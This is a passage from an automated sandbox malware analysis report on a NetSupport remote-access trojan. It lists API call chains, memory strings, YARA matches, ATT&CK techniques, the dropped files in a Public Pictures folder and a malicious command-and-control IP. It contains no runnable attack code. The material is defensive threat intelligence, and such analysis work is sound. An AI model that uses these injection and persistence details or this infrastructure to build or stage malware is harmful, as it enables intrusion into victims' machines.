                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0045A537
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,1_2_1102D330
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,1_2_11065890
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,1_2_1106A0A0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,1_2_111266E0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,1_2_1110AFD0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C8D5 VirtualQuery,GetSystemInfo,0_2_0045C8D5
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla}l*
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: file.exe, 00000000.00000002.1738746536.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
                                Source: file.exe, 00000000.00000002.1738746536.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: bild.exe, 00000001.00000002.4178688814.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4178688814.0000000000C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: bild.exe, 00000001.00000002.4180015307.0000000005630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0000
                                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-23450
                                Source: C:\Users\Public\Pictures\bild.exeAPI call chain: ExitProcess graph end nodegraph_1-76707
                                Source: C:\Users\Public\Pictures\bild.exeAPI call chain: ExitProcess graph end nodegraph_1-76077
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0045DA75
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,1_2_11147750
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,1_2_11029590
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00464A5A mov eax, dword ptr fs:[00000030h]0_2_00464A5A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00468AAA GetProcessHeap,0_2_00468AAA
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0045DA75
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00465B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00465B53
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045DBC3 SetUnhandledExceptionFilter,0_2_0045DBC3
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0045DD7C
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,1_2_11093080
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,1_2_110310C0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_11161D01
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1116DD89
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,1_2_110F4560
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,1_2_1111FCA0
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Pictures\bild.exe "C:\Users\Public\Pictures\bild.exe" Jump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,1_2_1109E190
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,1_2_1109E910
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWnd
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045D8CB cpuid 0_2_0045D8CB
                                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0045932F
                                Source: C:\Users\Public\Pictures\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_11173A35
                                Source: C:\Users\Public\Pictures\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,1_2_11173D69
                                Source: C:\Users\Public\Pictures\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_11173CC6
                                Source: C:\Users\Public\Pictures\bild.exeCode function: GetLocaleInfoA,1_2_1116B38E
                                Source: C:\Users\Public\Pictures\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_11173933
                                Source: C:\Users\Public\Pictures\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,1_2_111739DA
                                Source: C:\Users\Public\Pictures\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_1117383E
                                Source: C:\Users\Public\Pictures\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_11173D2D
                                Source: C:\Users\Public\Pictures\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_11173C06
                                Source: C:\Users\Public\Pictures\bild.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_6C7CDC56
                                Source: C:\Users\Public\Pictures\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_6C7C1CC1
                                Source: C:\Users\Public\Pictures\bild.exeCode function: GetLocaleInfoA,1_2_6C7CDC99
                                Source: C:\Users\Public\Pictures\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_6C7C1DB6
                                Source: C:\Users\Public\Pictures\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,1_2_6C7C1E5D
                                Source: C:\Users\Public\Pictures\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_6C7C1EB8
                                Source: C:\Users\Public\Pictures\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,1_2_110F33F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0045C131
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,1_2_1103B160
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_11174AE9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044A8E0 GetVersionExW,0_2_0044A8E0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,1_2_11070090
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,1_2_110D8200
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C79A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,1_2_6C79A980
                                Source: Yara matchFile source: 1.0.bild.exe.220000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.220000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.6d120000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.6d100000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.335d800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.6c790000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.4178457146.0000000000222000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000000.1735795513.0000000000222000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7548, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7716, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Pictures\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Pictures\bild.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Pictures\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Pictures\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Pictures\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Pictures\PCICL32.DLL, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                1
                                Input Capture
                                12
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                2
                                Valid Accounts
                                2
                                Valid Accounts
                                3
                                Obfuscated Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                22
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter
                                1
                                Windows Service
                                21
                                Access Token Manipulation
                                2
                                Software Packing
                                Security Account Manager3
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution
                                Login Hook1
                                Windows Service
                                1
                                DLL Side-Loading
                                NTDS44
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                4
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script13
                                Process Injection
                                1
                                Masquerading
                                LSA Secrets251
                                Security Software Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                                Valid Accounts
                                Cached Domain Credentials2
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                Virtualization/Sandbox Evasion
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt13
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                file.exe50%ReversingLabsWin32.Trojan.NetSupport
                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Pictures\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Pictures\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Pictures\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Pictures\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Pictures\bild.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Pictures\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Pictures\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Pictures\remcmdstub.exe13%ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://www.symauth.com/rpa000%URL Reputationsafe
                                http://www.symauth.com/cps0(0%URL Reputationsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                104.26.0.231
                                truefalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    unknown
                                    http://185.215.113.67/fakeurl.htmtrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.pci.co.uk/supportfile.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                        unknown
                                        http://%s/testpage.htmwininet.dllbild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                          unknown
                                          http://geo.netsupportsoftware.com/arebild.exe, 00000001.00000002.4180015307.0000000005630000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                              unknown
                                              http://www.pci.co.uk/supportsupportfile.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                unknown
                                                http://www.symauth.com/rpa00file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://geo.netsupportsoftware.com/location/loca.aspq-bild.exe, 00000001.00000002.4178688814.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://127.0.0.1RESUMEPRINTINGfile.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                    unknown
                                                    http://%s/testpage.htmbild.exe, bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                      unknown
                                                      http://geo.netsupportsoftware.com/location/loca.asp0bild.exe, 00000001.00000002.4178688814.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000003.1743479292.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.netsupportschool.com/tutor-assistant.asp11(file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                          unknown
                                                          http://127.0.0.1bild.exe, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                            unknown
                                                            http://www.symauth.com/cps0(file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733526387.0000000003534000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.netsupportschool.com/tutor-assistant.aspfile.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                              unknown
                                                              http://%s/fakeurl.htmbild.exe, bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                                unknown
                                                                http://geo.netsupportsoftware.com/bild.exe, 00000001.00000002.4180015307.0000000005630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://geo.netsupportsoftware.com/location/loca.asplbild.exe, 00000001.00000002.4178688814.0000000000C5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    185.215.113.67
                                                                    unknownPortugal
                                                                    206894WHOLESALECONNECTIONSNLtrue
                                                                    104.26.0.231
                                                                    geo.netsupportsoftware.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1542259
                                                                    Start date and time:2024-10-25 18:04:06 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 22s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:5
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal88.rans.evad.winEXE@3/12@1/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 82%
                                                                    • Number of executed functions: 215
                                                                    • Number of non-executed functions: 151
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • VT rate limit hit for: file.exe
                                                                    TimeTypeDescription
                                                                    12:05:34API Interceptor16635100x Sleep call for process: bild.exe modified
